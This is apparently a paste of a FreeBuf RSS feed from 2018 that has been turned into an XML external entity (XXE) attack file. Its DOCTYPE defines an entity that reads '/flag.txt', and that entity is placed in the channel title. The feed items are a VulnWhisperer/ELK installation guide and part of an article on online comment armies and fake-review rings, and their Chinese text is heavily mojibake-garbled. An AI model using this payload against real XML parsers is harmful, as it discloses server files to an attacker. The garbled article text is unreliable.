· 8 years ago · Jul 26, 2018, 08:46 AM
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE root [
3<!ELEMENT root ANY>
4<!ENTITY xxdata SYSTEM '/flag.txt'>
5]>
6<rss version="2.0"
7 xmlns:content="http://purl.org/rss/1.0/modules/content/"
8 xmlns:wfw="http://wellformedweb.org/CommentAPI/"
9 xmlns:dc="http://purl.org/dc/elements/1.1/"
10 xmlns:atom="http://www.w3.org/2005/Atom"
11 xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
12 xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
13 >
14
15<channel>
16 <title>&xxdata;</title>
17 <atom:link href="http://www.freebuf.com/feed" rel="self" type="application/rss+xml" />
18 <link>http://www.freebuf.com</link>
19 <description></description>
20 <lastBuildDate>Thu, 26 Jul 2018 08:02:47 +0000</lastBuildDate>
21 <language>zh-CN</language>
22 <sy:updatePeriod>hourly</sy:updatePeriod>
23 <sy:updateFrequency>1</sy:updateFrequency>
24
25 <item>
26 <title>VulnWhisperer:数æ®å¯è¢«ElasticSearchç´¢å¼•çš„æ¼æ´žæ•°æ®åŠæŠ¥å‘Šæ•´åˆå·¥å…·</title>
27 <link>http://www.freebuf.com/sectool/177189.html</link>
28 <comments>http://www.freebuf.com/sectool/177189.html#comments</comments>
29 <pubDate>Thu, 26 Jul 2018 07:00:45 +0000</pubDate>
30 <dc:creator>secist</dc:creator>
31 <category><![CDATA[工具]]></category>
32 <category><![CDATA[Logstash]]></category>
33 <category><![CDATA[æ¼æ´ž]]></category>
34
35 <guid isPermaLink="false">http://www.freebuf.com/?p=177189</guid>
36 <description><![CDATA[VulnWhispereræ˜¯ä¸€ä¸ªæ¼æ´žæ•°æ®å’ŒæŠ¥å‘Šçš„æ•´åˆå·¥å…·ã€‚VulnWhisperer会æå–所有报告并创建一个具有唯一文件å的文件,然åŽå°†å…¶å‘é€ç»™logstash。Logstash则会从文件å䏿喿•°æ®æ ‡è®°æŠ¥å‘Šä¸çš„æ‰€æœ‰ä¿¡æ¯ï¼ˆè¯·å‚阅logstash_vulnwhisp.conf文件),并最终将数æ®å‘é€åˆ°elasticsearch进行索引。 当剿”¯æŒ æ¼æ´žæ¡†æž¶ï¼š Nessus (v6 & v7) Qualys Web Applications Qualys Vulnerability Management OpenVAS Tenable.io Nexposeï¼ˆæš‚ä¸æ”¯æŒï¼‰ Insight VMï¼ˆæš‚ä¸æ”¯æŒï¼‰ NMAPï¼ˆæš‚ä¸æ”¯æŒï¼‰ 更多 å®‰è£…åŠæ“作概è¦ï¼š 1.ä¸¥æ ¼éµå¾ªå®‰è£…è¦æ±‚。 2.在example.ini文件ä¸å¡«å†™ä½ è¦å¤„ç†çš„部分。 3.修改logstash文件ä¸çš„IP,并将它们导入到logstash conf目录(默认为/etc/logstash/conf.d/)。 4.导入kibanaå¯è§†åŒ–。 5.è¿è¡ŒVulnwhisperer。 安装环境 1.ElasticStack 5.x 2.Python 2.7 3.æ¼æ´žæ‰«æå™¨ å¯é€‰ï¼šMessage broker 例如Kafka或RabbitMQ VulnWhisperer安装(å¯èƒ½éœ€è¦sudo) 首先,我们需è¦å®‰è£…å…¶ä¾èµ–项: sudo apt-get install zlib1g-dev libxml2-dev libxslt1-dev 接ç€ï¼Œæˆ‘们安装ä¾èµ–模å—: cd deps/qualysapi python setup.py install 最åŽï¼Œå®‰è£…VulnWhisperer: pip install -r /path/to/VulnWhisperer/requirements.txt cd /path/to/VulnWhisperer python setup.py install ELK节点安装示例 å¦‚æžœä½ æ²¡æœ‰çŽ°æˆçš„ELK集群/èŠ‚ç‚¹ï¼Œä»¥ä¸‹å°†ä¸ºä½ æä¾›åœ¨Debian上的Elasticsearch&Kibana独立节点的安装指å—。  请注æ„,还有一个docker-compose.yml文件也å¯ç”¨ã€‚ Debian: https://www.elastic.co/guide/en/elasticsearch/reference/5.6/deb.html sudo apt-get install -y default-jre wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add - sudo apt-get install apt-transport-https echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list sudo apt-get update && sudo apt-get install elasticsearch kibana […]]]></description>
37 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">VulnWhispereræ˜¯ä¸€ä¸ªæ¼æ´žæ•°æ®å’ŒæŠ¥å‘Šçš„æ•´åˆå·¥å…·ã€‚VulnWhisperer会æå–所有报告并创建一个具有唯一文件å的文件,然åŽå°†å…¶å‘é€ç»™logstash。Logstash则会从文件å䏿喿•°æ®æ ‡è®°æŠ¥å‘Šä¸çš„æ‰€æœ‰ä¿¡æ¯ï¼ˆè¯·å‚阅logstash_vulnwhisp.conf文件),并最终将数æ®å‘é€åˆ°elasticsearch进行索引。</b> </p>
38<p><b style="color: rgb(0, 176, 80);"><img alt="vuln_whisperer_logo_s.png" src="http://image.3001.net/images/20180711/15312626245927.png!small" width="690" height="621"></b></p>
39<h2>当剿”¯æŒ</h2>
40<h3><strong>æ¼æ´žæ¡†æž¶ï¼š</strong></h3>
41<p><a href="https://www.tenable.com/products/nessus/nessus-professional" ref="">Nessus (v6 & <strong>v7</strong>)</a></p>
42<p><a href="https://www.qualys.com/apps/web-app-scanning/">Qualys Web Applications</a></p>
43<p><a href="https://www.qualys.com/apps/vulnerability-management/">Qualys Vulnerability Management</a></p>
44<p><a href="http://www.openvas.org/">OpenVAS</a></p>
45<p><a href="https://www.tenable.com/products/tenable-io">Tenable.io</a></p>
46<p><a href="https://www.rapid7.com/products/nexpose/">Nexpose</a><span style="color: rgb(51, 51, 51);">ï¼ˆæš‚ä¸æ”¯æŒï¼‰</span></p>
47<p><a href="https://www.rapid7.com/products/insightvm/">Insight VM</a><span style="color: rgb(51, 51, 51);">ï¼ˆæš‚ä¸æ”¯æŒï¼‰</span></p>
48<p><a href="https://nmap.org/">NMAP</a><span style="color: rgb(51, 51, 51);">ï¼ˆæš‚ä¸æ”¯æŒï¼‰</span></p>
49<p>更多</p>
50<h2>å®‰è£…åŠæ“作概è¦ï¼š</h2>
51<p>1.ä¸¥æ ¼éµå¾ªå®‰è£…è¦æ±‚。</p>
52<p>2.在<a href="https://github.com/austin-taylor/VulnWhisperer/blob/master/configs/frameworks_example.ini">example.ini</a><span style="color: rgb(51, 51, 51); font-size: 16px;">文件ä¸å¡«å†™ä½ è¦å¤„ç†çš„部分。</span></p>
53<p>3.修改<a href="https://github.com/austin-taylor/VulnWhisperer/tree/master/logstash">logstash文件</a><span style="color: rgb(51, 51, 51); font-size: 16px;">ä¸çš„IP,并将它们导入到logstash conf目录(默认为/etc/logstash/conf.d/)。</span></p>
54<p>4.导入<a href="https://github.com/austin-taylor/VulnWhisperer/tree/master/kibana/vuln_whisp_kibana">kibanaå¯è§†åŒ–</a>。</p>
55<p>5.è¿è¡Œ<a href="https://github.com/austin-taylor/VulnWhisperer#run">Vulnwhisperer</a>。</p>
56<h3><strong>安装环境</strong></h3>
57<p>1.ElasticStack 5.x</p>
58<p>2.Python 2.7</p>
59<p>3.æ¼æ´žæ‰«æå™¨</p>
60<p>å¯é€‰ï¼šMessage broker 例如Kafka或RabbitMQ</p>
61<h3><strong>VulnWhisperer安装(å¯èƒ½éœ€è¦sudo)</strong></h3>
62<p>首先,我们需è¦å®‰è£…å…¶ä¾èµ–项:</p>
63<pre><code>sudo apt-get install zlib1g-dev libxml2-dev libxslt1-dev </code></pre>
64<p>接ç€ï¼Œæˆ‘们安装ä¾èµ–模å—:</p>
65<pre><code>cd deps/qualysapi
66python setup.py install</code></pre>
67<p>最åŽï¼Œå®‰è£…VulnWhisperer:</p>
68<pre><code>pip install -r /path/to/VulnWhisperer/requirements.txt
69cd /path/to/VulnWhisperer
70python setup.py install</code></pre>
71<h3><strong>ELK节点安装示例</strong></h3>
72<p>å¦‚æžœä½ æ²¡æœ‰çŽ°æˆçš„ELK集群/èŠ‚ç‚¹ï¼Œä»¥ä¸‹å°†ä¸ºä½ æä¾›åœ¨Debian上的Elasticsearch&Kibana独立节点的安装指å—。 </p>
73<p>请注æ„,还有一个docker-compose.yml文件也å¯ç”¨ã€‚</p>
74<p><strong>Debian:</strong> <a href="https://www.elastic.co/guide/en/elasticsearch/reference/5.6/deb.html">https://www.elastic.co/guide/en/elasticsearch/reference/5.6/deb.html</a></p>
75<pre><code>sudo apt-get install -y default-jre
76wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
77sudo apt-get install apt-transport-https
78echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list
79sudo apt-get update && sudo apt-get install elasticsearch kibana logstash
80sudo /bin/systemctl daemon-reload
81sudo /bin/systemctl enable elasticsearch.service
82sudo /bin/systemctl enable kibana.service
83sudo /bin/systemctl enable logstash.service</code></pre>
84<h3><strong>Elasticsearch&Kibanaé…置示例</strong></h3>
85<p><b>ä½¿ç”¨ä½ å–œæ¬¢çš„æ–‡æœ¬ç¼–è¾‘å™¨</b></p>
86<p>获å–主机IP,更改etc /elasticsearch/elasticsearch.yml文件ä¸çš„IP。(默认为’localhost’)</p>
87<p>验è¯Elasticsearch是å¦åœ¨ç«¯å£9200上è¿è¡Œã€‚(默认)</p>
88<p>获å–主机IP,更改/etc/kibana/kibana.yml文件ä¸çš„IP(默认为’localhost’)。验è¯Kibanaæ˜¯å¦æŒ‡å‘æ£ç¡®çš„Elasticsearch IP。(这是在上一æ¥ä¸è®¾ç½®çš„)</p>
89<p>验è¯Kibana是å¦åœ¨ç«¯å£5601上è¿è¡Œã€‚(默认)</p>
90<p>å¯åЍelasticsearch,验è¯å®ƒä»¬æ˜¯å¦æ£åœ¨è¿è¡Œ/相互通信:</p>
91<pre><code>sudo service elasticsearch start
92sudo service kibana start</code></pre>
93<p>或</p>
94<pre><code>sudo systemctl start elasticsearch.service
95sudo systemctl start kibana.service</code></pre>
96<h3><strong>Logstashé…置说明示例</strong></h3>
97<p>å°†/VulnWhisperer/logstash/ä¸çš„Logstash .conf文件,å¤åˆ¶æˆ–移动到/etc/logstash/conf.d/</p>
98<p>验è¯Logstash.conf文件输入,是å¦å·²åœ¨input.file.path目录ä¸åŒ…å«äº†VulnWhisper Scansçš„æ£ç¡®ä½ç½®ï¼š</p>
99<pre><code>input {
100 file {
101 path => "/opt/vulnwhisperer/nessus/**/*"
102 start_position => "beginning"
103 tags => "nessus"
104 type => "nessus"
105 }
106}</code></pre>
107<p>验è¯Logstash.conf文件输出,是å¦å·²åŒ…å«äº†ä¸Šä¸€æ¥ä¸æ£ç¡®çš„Elasticsearch IP设置(默认为localhost):</p>
108<pre><code>output {
109 if "nessus" in [tags] or [type] == "nessus" {
110 #stdout { codec => rubydebug }
111 elasticsearch {
112 hosts => [ "localhost:9200" ]
113 index => "logstash-vulnwhisperer-%{+YYYY.MM}"
114 }
115 }</code></pre>
116<p>验è¯logstash是å¦å·²å…·æœ‰æ£ç¡®çš„æ–‡ä»¶æƒé™ï¼Œå¯ä»¥è¯»å–VulnWhisperer Scansçš„ä½ç½®ã€‚</p>
117<p>é…置完æˆåŽè¿è¡ŒLogstash <img src='http://image.3001.net/images/index/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> 作为æœåŠ¡è¿è¡ŒLogstash将获å–/etc/logstash/conf.d/ä¸çš„æ‰€æœ‰æ–‡ä»¶ã€‚å¦‚æžœä½ åªæƒ³è¿è¡Œå•个logstash文件,请å‚考以下命令):</p>
118<p>作为æœåŠ¡è¿è¡ŒLogstash:</p>
119<pre><code>sudo service logstash start</code></pre>
120<p>或</p>
121<pre><code>sudo systemctl start logstash.service</code></pre>
122<p>å•个logstash文件:</p>
123<pre><code>sudo /usr/share/logstash/bin/logstash --path.settings /etc/logstash/ -f /etc/logstash/conf.d/1000_nessus_process_file.conf</code></pre>
124<h2><strong>é…ç½®</strong></h2>
125<h3>VulnWhispereré…置:</h3>
126<p>1.é…ç½®Ini文件</p>
127<p>2.设置Logstash文件</p>
128<p>3.导入ElasticSearch模æ¿</p>
129<p>4.导入Kibana仪表æ¿</p>
130<p><a href="https://github.com/austin-taylor/VulnWhisperer/blob/master/configs/frameworks_example.ini">frameworks_example.ini文件</a>:</p>
131<h2><img alt="config_example.png" src="http://image.3001.net/images/20180711/15312627434132.png!small" width="315" height="154"></h2>
132<h2>è¿è¡Œ</h2>
133<p>填写必è¦ä¿¡æ¯è‡³inié…ç½®æ–‡ä»¶ï¼Œç„¶åŽæ‰§è¡Œå¦‚下命令。</p>
134<pre><code>vuln_whisperer -c configs/frameworks_example.ini -s nessus
135or
136vuln_whisperer -c configs/frameworks_example.ini -s qualys</code></pre>
137<p><strong><img alt="running_vuln_whisperer.png" src="http://image.3001.net/images/20180711/15312627702433.png!small" width="690" height="119"></strong></p>
138<h3><strong>æ¯æ™šè¿è¡Œ</strong></h3>
139<p>å¦‚æžœä½ å½“å‰è¿è¡Œçš„系统为linux,请务必创建一个cronjobä»¥åˆ é™¤å˜å‚¨åœ¨æ•°æ®åº“ä¸çš„æ—§æ–‡ä»¶ã€‚å¦‚æžœä½ æ£åœ¨ä½¿ç”¨json,请务必更改.csv。</p>
140<p>使用以下设置创建用户级的crontab - å…¶è¡¨ç¤ºå°†åœ¨æ¯æ™šçš„0130è¿è¡Œvulnwhisperer:</p>
141<pre><code>00 1 * * * /usr/bin/find /opt/vulnwhisp/ -type f -name '*.csv' -ctime +3 -exec rm {} \;</code></pre>
142<pre><code>30 1 * * * /usr/local/bin/vuln_whisperer -c /opt/vulnwhisp/configs/example.ini</code></pre>
143<p>而对于Windowsç³»ç»Ÿï¼Œä½ å¯èƒ½éœ€è¦åœ¨bin目录ä¸çš„vulnWhispererä¸é”®å…¥äºŒè¿›åˆ¶æ–‡ä»¶çš„完整路径。</p>
144<h2>视频演示</h2>
145<p style="text-align: center;"><iframe frameborder="0" width="640" height="498" src="https://v.qq.com/iframe/player.html?vid=g0719imnhzm&tiny=0&auto=0"></iframe></p>
146<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼š<a href="https://github.com/austin-taylor/VulnWhisperer">GitHub</a>,FBå°ç¼– secist 编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
147]]></content:encoded>
148 <wfw:commentRss>http://www.freebuf.com/sectool/177189.html/feed</wfw:commentRss>
149 <slash:comments>0</slash:comments>
150 </item>
151 <item>
152 <title>èµ°è¿›èŒä¸šé”®ç›˜ä¾ çš„ä¸–ç•Œï¼Œä¹˜é£Žç ´æµªæ²¡æœ‰è°èƒ½é˜»æŒ¡çš„黑产江湖</title>
153 <link>http://www.freebuf.com/articles/network/178669.html</link>
154 <comments>http://www.freebuf.com/articles/network/178669.html#comments</comments>
155 <pubDate>Thu, 26 Jul 2018 05:50:26 +0000</pubDate>
156 <dc:creator>GEETESTæžéªŒ</dc:creator>
157 <category><![CDATA[网络安全]]></category>
158 <category><![CDATA[水军]]></category>
159 <category><![CDATA[网络黑产]]></category>
160
161 <guid isPermaLink="false">http://www.freebuf.com/?p=178669</guid>
162 <description><![CDATA[éšç€äº’è”网由web1.0å‘展到web2.0,互è”网第一批黑色产业链就诞生,而在这里é¢å°±æœ‰å¯å·ç§°â€œé»‘产活化石â€çš„网络水军队ä¼ã€‚ä»Šå¤©è®©æˆ‘ä»¬èµ°è¿›ä»–ä»¬çš„ä¸–ç•Œï¼Œä¹˜é£Žç ´æµªæ²¡æœ‰è°èƒ½é˜»æŒ¡çš„黑产江湖…… 演示视频 他们也曾网上冲浪,éšç€äº’è”网的è¿ä»£å˜è¿ï¼Œä»–们激战过天涯ã€çŒ«æ‰‘ã€è¥¿ç¥ 胡åŒï¼Œä¹Ÿæ›¾åœ¨åšå®¢ã€å¼€å¿ƒã€äººäººä¸ŠæŒ‡ç‚¹æ±Ÿå±±ï¼ŒåŽæ¥ä»–们转战微åšã€å¾®ä¿¡ã€ç”µå•†ã€‚ å¦‚ä»Šï¼Œä»–ä»¬å·²æ¸—é€æ•´ä¸ªäº’è”网世界,并且构建了一个庞大的黑色 â€œç”Ÿæ€â€ã€‚ æ— æ‰€ä¸èƒ½â€œäº”毛党†作为ä¸å›½äº’è”网的特色产物,èŒä¸šæˆ–åŠèŒä¸šçš„付费写手称为互è”网水军,而在这里é¢ï¼Œè§„æ¨¡æœ€ä¸ºåºžå¤§çš„è¦æ•°äº”毛党。 “五毛党â€åœ¨å¹¿ä¹‰ä¸Šï¼Œå¤šæŒ‡äº’è”网当ä¸ï¼Œä¸ºäº†é’±è€Œå޻呿Ÿä¸ªå¸–,é˜è¿°æŸä¸ªè§‚点的人。åˆå› 为最早的å‘帖者除底薪外,æ¯å¸–按五毛钱æ¥åŠ è–ªï¼Œè¢«ç½‘æ°‘æˆç§°ä¸ºâ€œäº”毛党â€ã€‚他们ä¹äºŽä¸ºä»˜è´¹äººå£«åœ¨äº’è”ç½‘ä¸ŠçŒæ°´ï¼ŒåŒ…括å‘帖ã€è¯„论ã€ä¼ æ’æµè¨€æˆ–è€…å¸¦æœ‰æŒ‡å‘æ€§çš„舆论信æ¯ç‰ç‰ã€‚ åŠ æ‹¿å¤§ç»´å¤šåˆ©äºšå¤§å¦çš„ç ”ç©¶äººå‘˜æ›¾è”åˆåŒ—京大å¦çš„å¦è€…å…±åŒå‘布了一项å为《Undercover Researchers Expose Chinese Internet Water Army》的报告,直指ä¸å›½ç½‘络水军: æŠ¥å‘Šä¸»è¦æœé›†äº†æ–°æµªã€æœç‹ä¸¤å®¶é—¨æˆ·ç½‘站的700个用户近20,000æ¡è¯„论数æ®ï¼Œå¹¶è¯•图区别“五毛党â€ä¸Žæ£å¸¸ç”¨æˆ·çš„区别。最终å‘现: â€œäº”æ¯›å…šâ€æ›´å€¾å‘于å‘è¡¨æ–°çš„è¯„è®ºï¼Œè€Œä¸æ˜¯å¯¹å…¶å®ƒè¯„论进行回å¤ã€‚å…¶ä¸ï¼Œè¶…过50%的人会间隔2.5分钟就会å‘一个新帖。与普æ£å¸¸ç”¨æˆ·ç›¸æ¯”ï¼Œä»–ä»¬ä¼šæ›´å¿«åœ°ä»Žè®¨è®ºä¸æŠ½èº«è€Œå‡ºï¼Œå¹¶å°†ID弃而ä¸ç”¨ã€‚而且,他们æ¯ä¸ªäººå‘布的内容也有很大ä¸åŒï¼Œè¿™äº›äººå¤§å¤šé€šè¿‡å‰ªè´´æ–¹å¼ï¼Œåå¤å‘表相åŒå†…容。调查人员å‘现,在新浪,æœç‹ç½‘站上,相似评论内容的é‡å¤çŽ‡é«˜è¾¾88%。 ç½‘ä¼ â€œäº”æ¯›å…šâ€å·¥èµ„æ¸…å• è€Œåœ¨â€œäº”æ¯›å…šâ€ä¸‹æ¸¸ï¼Œåˆæœ‰ä¼—å¤šåˆ†æ”¯ï¼ŒèƒŒåŽæ˜¯ä¸€æ¡ç”±æŽ¨æ‰‹ã€æžªæ‰‹ã€æ°´å†›ç»„æˆçš„庞大的利益链桅… æ®æ–°åŽç¤¾æŠ¥ï¼Œ2017å¹´5月以æ¥ï¼Œä¸åŽäººæ°‘共和国公安部部署å„地公安机关开展打击“网络水军â€å…¨å›½é›†ç¾¤æˆ˜å½¹ï¼Œå·²ç ´èŽ·â€œç½‘ç»œæ°´å†›â€è¿æ³•犯罪案件40余起,涉案总金é¢ä¸Šäº¿å…ƒï¼ŒæŠ“èŽ·è¿æ³•犯罪嫌疑人200ä½™äººï¼ŒæŸ¥èŽ·å¹¶å…³åœæ¶‰å«Œéžæ³•炒作的网络账å·5000余个,关é—è¿æ³•è¿è§„网站上万个,涉åŠç½‘ä¸Šæ¶æ„ç‚’ä½œä¿¡æ¯æ•°åƒä¸‡æ¡ã€‚ 然而,黑产世界何其之大,全国èŒä¸šæˆ–åŠèŒä¸šâ€œäº”毛党â€ä½•æ¢åƒä¸‡ï¼ 电商æ»ç©´â€œå·®è¯„å¸ˆâ€ å¦‚æžœå°†â€œäº”æ¯›å…šâ€æ¯”作网络水军人海战术般的野路å,那么èŒä¸šå·®è¯„师就是网络水军ä¸çš„特ç§å…µã€‚3-5人编制的èŒä¸šå·®è¯„å¸ˆï¼Œå‡ å¤©ä¸‹æ¥ç”šè‡³å¯ä»¥æžåž®ä¸€å®¶ç½‘红店@ èŒä¸šå·®è¯„师”æ“作æµç¨‹å›¾ 与“五毛党â€ä¸åŒï¼Œä»–ä»¬çš„ä¸šåŠ¡æ›´åŠ ç²¾å‡†ï¼Œå°±æ˜¯å·®è¯„ã€‚å› ä¸ºåšçš„就是电商的生æ„,所以这次淘å®ä¸Šè‚¯å®šæ˜¯æ‰¾ä¸åˆ°ä»–们的身影。他们体é‡åºžå¤§ï¼Œèµ·æ¥éƒ½æ˜¯è§„模达2000人的QQ群…… èŒä¸šå·®è¯„师“工作交æµç¾¤â€ 与其他黑产群ä¸åŒï¼Œè¿™ä¸ªå‡ 乎ä¸è®¾é—¨æ§›ï¼Œå¾ˆå®¹æ˜“就混进3个2000人群。但当Magiccc准备干活时,傻了眼: 群内全员ç¦è¨€ å¯èƒ½æ˜¯å¯Ÿè§‰åˆ°äº†ä»€ä¹ˆï¼Œå…¶ä»–å‡ ä¸ªç¾¤éƒ½æ˜¯ç¦è¨€çжæ€ã€‚没办法,åªè¦å¦æ‰¾è·¯åï¼ŒåŠ äº†ä¸ªâ€œèŒæ–°ç¾¤â€ï¼Œå¦è¾Ÿè¹Šå¾„…… 然而,没想到的是,这些群在临近æ£å¸¸ä¸Šçæ—下ç的点,开始活跃起楅… â€œèŒæ–°ç¾¤â€ä»¥è€å¸¦æ–° æ ¹æ®ç»éªŒï¼Œè¿™ç¾¤äººæåˆ°çš„“肉â€åº”该是行业暗è¯ã€‚群主“english nameâ€åœ¨çº¿ä¸ºæ–°äººåšå¼•导,è¯è¯´50元的入会费真心ä¸è´µ……(相较æŸäº›é»‘äº§åŠ¨è¾„å‡ ç™¾ä¸Šåƒçš„费用,èŒä¸šå·®è¯„师的门槛算良心价) èŒä¸šå·®è¯„师,把电商的店铺称为“肉â€ï¼Œä¸€èˆ¬éƒ½ä¼šé€‰æ‹©æ–°å¼€çš„网店,寻找网店å«â€œæ‰¾è‚‰åƒâ€ï¼Œæ–°å…¥è¡Œçš„差评师通过验è¯çš„æš—è¯é€šå¸¸ä¸ºâ€œæ±‚åƒè‚‰â€ã€‚在这个新人群里,群主表示这仅仅是一个准备群。 群主“english nameâ€åå¤è¡¨ç¤ºï¼Œâ€œä½ 们è¦ç”¨è„‘ï¼è¦ç”¨è„‘ï¼çœ‹çœ‹ç¾¤ç›¸å†Œé‡Œé¢çš„æµç¨‹å›¾ï¼Œåšå¥½å‡†å¤‡å†æ¥å«æˆ‘ï¼â€è€Œæ ¹æ®è¿™ä¸ªæµç¨‹å›¾æ¥çœ‹ï¼Œä¸€ä¸ªæ–°å…¥é—¨çš„“èŒä¸šå·®è¯„师â€é¦–å…ˆè¦å‡†å¤‡æ‰“猎用的“枪â€ï¼šä¸€ä¸ªä¸è®°å的手机å¡ï¼ˆé»‘å¡ï¼‰ã€ä¸€ä¸ªå‡çš„身份è¯ï¼ˆä¹Ÿèƒ½å¼„到真的),然åŽé€šè¿‡è¿™ä¸ªå‡çš„身份è¯ï¼ŒåŽ»æ·˜å®æ³¨å†Œæ”¯ä»˜å®å’Œè´¦æˆ·ã€‚ 没有手机å¡ä¸è¦ç´§ï¼Œç¾¤ä¸»æé†’å…¥é—¨è€…åŽ»æŒ‡å®šæ¸ é“è´ä¹°ï¼›æ²¡æœ‰å‡èº«ä»½è¯ä¸è¦ç´§ï¼Œåªéœ€è¦åœ¨ç¾¤ä¸»å¤„缴纳50元的入门费,就å¯ä»¥å¾—到一串身份è¯å·ã€‚æœåŠ¡å¯è°“是细致入微,教å¦è´¨é‡å¯æƒ³è€ŒçŸ¥…… 这群人都是昼ä¼å¤œå‡ºï¼Œèµ„深差评师一般都是å•干,当然å¶å°”ä¹Ÿä¼šå¸¦ç€æ–°äººâ€œåˆ·ä»»åŠ¡â€ã€‚ 而这时候,å¦å¤–接任务的åƒäººç¾¤ä¹Ÿå¼€å§‹æ´»è·ƒèµ·æ¥ï¼š ä¸šåŠ¡ç¾¤å¼€å§‹æŽ¥å• è€Œåœ¨ç™½å¤©ï¼Œæœ‰å‡ ä¸ªç¾¤ä¸»è¯•æŽ¢æ€§çš„æ‰¾åˆ°MagicccèŠäº†ä¸‹ï¼Œè¡Œæƒ…å·®ä¸å¤šåœ¨15元到20元之间,当然å¯èƒ½è¿˜æœ‰æ›´ä½Žçš„。 å¦å¤–ä¸€ä¸ªâ€œèŒæ–°ç¾¤â€ï¼ŒMagiccc很快跟一ä½èµ„æ·±èŒä¸šå·®è¯„师混熟,这ä½è€å¸ˆå‚…表示“æ¯å¤©æ™šä¸Š10点,他会通过YYè¯éŸ³ç‚¹å,11点æ£å¼å¼€å§‹å¸¦æ–°äººåƒè‚‰â€ã€‚åŽæ¥è·Ÿè€å¸ˆå‚…èŠå¼€äº†ï¼Œä»–表示,他们手上有éžå¸¸å¤šçš„åƒäººç¾¤ï¼Œçœ‹æˆ‘åŠå¤©æ²¡å›žæ¶ˆæ¯ï¼Œä»–还以为我ä¸ç›¸ä¿¡ï¼ˆåˆ«è¯´åƒäººç¾¤äº†ï¼Œä½ 就说是万人群我都信)…… è€å¸ˆè¿˜è¡¨ç¤ºï¼Œåœ¨åƒäººç¾¤é‡Œï¼Œè°ˆåˆ¤æ‰‹æŽ¥åˆ°é¡¹ç›®åŽï¼Œä¼šæŠŠé’±ç›´æŽ¥è½¬å…¥å¤§å®¶çš„æ‹å·æ”¯ä»˜å®ä¸ã€‚一å•15å…ƒï¼Œæ¯æ™šéšä¾¿æŽ¥ä¸ª10å•,就是150å…ƒï¼Œåƒæˆ‘è¿™æ ·çš„â€œèŒæ–°â€å…¥è¡Œæœˆå…¥4500å…ƒä¸æˆé—®é¢˜ï¼è€Œèµ„æ·±å·®è¯„å¸ˆï¼Œæ›´æ˜¯è½»æ¾æœˆæ”¶å…¥ä¸Šä¸‡…… 水深难防,电商平å°è‹¦ä¸å ªè¨€ 我们都知é“ï¼Œæ·˜å®æžè¿‡èŒä¸šå·®è¯„师æ›å…‰å¹³å°ï¼Œä½†æ˜¯å› 为éšç§é—®é¢˜ï¼Œäº‰è®®ä¸æ–ï¼ŒåŽæ¥ä¹Ÿä¸äº†äº†ä¹‹ã€‚而这之åŽï¼Œè¿™ç¾¤äººæ›´åŠ æœ‰æƒæ— æï¼ 曾ç»çš„å·®è¯„å¸ˆæŸ¥è¯¢å¹³å° è€ŒçŽ°åœ¨ï¼Œç”µå•†å¹³å°çš„å–家,åªèƒ½é€šè¿‡æ·˜æŸ¥æŸ¥ã€æŸ¥å°å·ç‰ä¸€äº›åœ¨çº¿ä»˜è´¹å¹³å°è¿›è¡Œä¹°å®¶ä¿¡èª‰åˆ†æŸ¥è¯¢ã€‚ç„¶åŽï¼Œé€šè¿‡è¿™äº›ä¿¡æ¯åˆ¤æ–买家身份,至于效果如何,就ä¸å¾—而知了。 第三方查询å‚è€ƒä¿¡æ¯ å•从信誉级别æ¥çœ‹ï¼Œè¿™ä¸ªè¢«å°å·çš„èŒä¸šå·®è¯„师账å·å¯ä»¥è¯´éžå¸¸éšè”½ï¼Œ97.66%的好评率能够骗过ä¸å°‘电商å–家。 Magiccc认为,这些网络水军所谓的利益链金å—塔尖,背åŽéƒ½æ˜¯å“ªäº›äººã€‚è¡Œä¸šçš„æ¶æ€§ç«žäº‰ï¼Œä¸€æ–¹é¢é€šè¿‡æ³•å¾‹ä¸¥åŠ ç®¡æŽ§ï¼Œçº¦æŸä¼ä¸šï¼Œå¦å¤–针对水军ä¸çš„â€œå›¢é•¿â€æˆ–“水æ¯â€è¿™ç±»ç®¡ç†äººå‘˜ï¼Œä¹Ÿéœ€è¦ä¸¥æ ¼æ‰“击。 å¦å¤–一方é¢ï¼Œç›®å‰è¡Œä¸šç±»éžå¸¸å¤šçš„安全æœåŠ¡å•†ä¹Ÿå·²å…·å¤‡æˆç†Ÿçš„忬ºè¯ˆé£ŽæŽ§äº§å“以åŠè§£å†³æ–¹æ¡ˆã€‚基于海é‡ç”¨æˆ·æ•°æ®ï¼Œåˆ©ç”¨äººå·¥æ™ºèƒ½æŠ€æœ¯ï¼Œæå»ºè¡Œä¸ºæ¨¡åž‹å¹¶é€šè¿‡å›¢ä¼™å‘现,将业务安全风险扼æ€åœ¨æ‘‡ç¯®ä¸ï¼Œä»Žè€Œæå«ä¼ä¸šç½‘络资产,维护网络æ£å¸¸ç§©åºã€‚ *本文作者:GEETESTæžéªŒï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ªFreeBuf.COM]]></description>
163 <content:encoded><![CDATA[<h3><img alt="6a5e5471gy1fj4c08wofnj20s80hz7o9.jpg" src="http://image.3001.net/images/20180724/15324370266234.jpg!small" width="690" height="387"></h3>
164<h3><b style="color: rgb(0, 176, 80);">éšç€äº’è”网由web1.0å‘展到web2.0,互è”网第一批黑色产业链就诞生,而在这里é¢å°±æœ‰å¯å·ç§°â€œé»‘产活化石â€çš„网络水军队ä¼ã€‚ä»Šå¤©è®©æˆ‘ä»¬èµ°è¿›ä»–ä»¬çš„ä¸–ç•Œï¼Œä¹˜é£Žç ´æµªæ²¡æœ‰è°èƒ½é˜»æŒ¡çš„黑产江湖……</b></h3>
165<h2>演示视频</h2>
166<p style="text-align: center;"><iframe frameborder="0" width="640" height="498" src="https://v.qq.com/iframe/player.html?vid=j1344cjut73&tiny=0&auto=0"></iframe></p>
